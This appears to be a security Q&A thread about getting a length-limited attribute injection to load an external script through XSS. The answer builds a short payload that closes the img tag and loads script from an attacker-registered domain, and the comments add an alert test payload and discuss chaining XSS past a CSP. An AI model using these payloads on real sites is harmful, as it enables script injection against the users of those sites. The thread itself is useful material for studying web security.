# Triggering an XSS through a shortened URL?

Tags: xss, javascript, html, image

I have this piece of HTML:

```
<img src="image src" alt="{injectable}" title="{injectable}" border="0">
```

where `{injectable}` values correspond to the same input value that has to be 32 characters long. How can I trigger my XSS by an external JS file?

This is what I thought:

```
a"><script src="url">
```

It seems to work since Firefox closes my `<script>` tag automatically (and I think any other browsers do too). But what about the URL? How can I shorten it with a 32 characters long payload?

Comment: Are you looking for an [URL shortener](https://www.google.com/search?q=url+shortener)?

Answer (score 2):

32 characters are plenty for this case. Without a src, you are at 19 chars. 17 if you omit `"` around src, 16 if you omit the `a` (so you get `"><script src=>`).

You need two chars for the protocol (`//`) and nothing for the filename (just serve it from root). Which leaves you with 14 chars for the domain name.

You can easily register a domain with 5 characters yourself (2 chars for the name, 2 for the tld, one for the `.`), so 14 is no problem. The final payload would look something like `"><script src=//aa.aa>`, where `aa.aa` is the domain you registered.

You even have 9 chars to spare (eg to actually close the script, use a filename, a longer domain name, etc.)

Comment: Thank you! I've found I can look into chained XSS through this, so it's even easier to exploit. Since it's more a programming oriented concept now, I've [questioned on StackOverflow it](https://stackoverflow.com/questions/60984767/run-javascript-code-on-length-limited-input). Your help would really be appreciated!

Comment: @Leon Chaining XSS like that is also a fun technique, and it can actually be really useful if eg a CSP blocks all remote scripts. I would always go with including a remote script if I can as it lifts length and other restrictions, makes writing example exploits much easier, and is less noisy. But whatever works for you :)

Comment: could you suggest me how you'd chain XSS your way in there?

Comment: @Leon The same way you are attempting to, with comments to comment out undesired stuff. It's a bit annoying to debug (which is why I'd go with the simple script src approach), but it should work with a bit of patience (look at the browser console for error messages & use a text editor with proper code highlighting to make it easier to spot bugs).

Comment: that script doesn't get loaded, unfortunately. Also if it works under my console. How would you go for `script src` approach?

Comment: Are you sure there's an XSS vulnerability there? Have you tried a simple payload like `"><script>alert(1)</script>`? Is the page using a CSP with prevents inclusion of remote scripts?

Comment: Let us [continue this discussion in chat](https://chat.stackexchange.com/rooms/106252/discussion-between-leon-and-tim).